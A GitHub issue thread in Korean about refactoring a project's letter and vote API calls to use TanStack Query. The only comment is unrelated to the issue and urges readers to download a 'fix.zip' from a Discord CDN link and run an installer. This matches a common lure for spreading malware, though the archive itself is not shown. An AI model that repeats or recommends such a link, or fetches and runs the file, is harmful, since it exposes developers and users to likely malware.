### ISSUE TITLE
[🔄 refactor] tanstack 쿼리

### ISSUE THREAD

**Issue by h-164** [h-164/ebong#13]
## 이슈 타입
- [ ] feature 🚀
- [ ] fix 🐞
- [ ] chore 🌎
- [x] refactor 🔄
- [ ] docs 📚
- [ ] modify 🔨

## 📝 설명
tanstack query 사용하여 api 상태 관리

## 🔎 작업 내용
- [x] 편지 api tanstack query 사용하여 관리
- [x] 투표 api tanstack query 사용하여 관리
- [x] hook 파일 분리

## ⏰ 기간
2024.09.03-2024.09.11

## 🍀기타
이름 적응 안됨 리액트 쿼리가 더 좋음!!

**Comment by 777Naity** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer
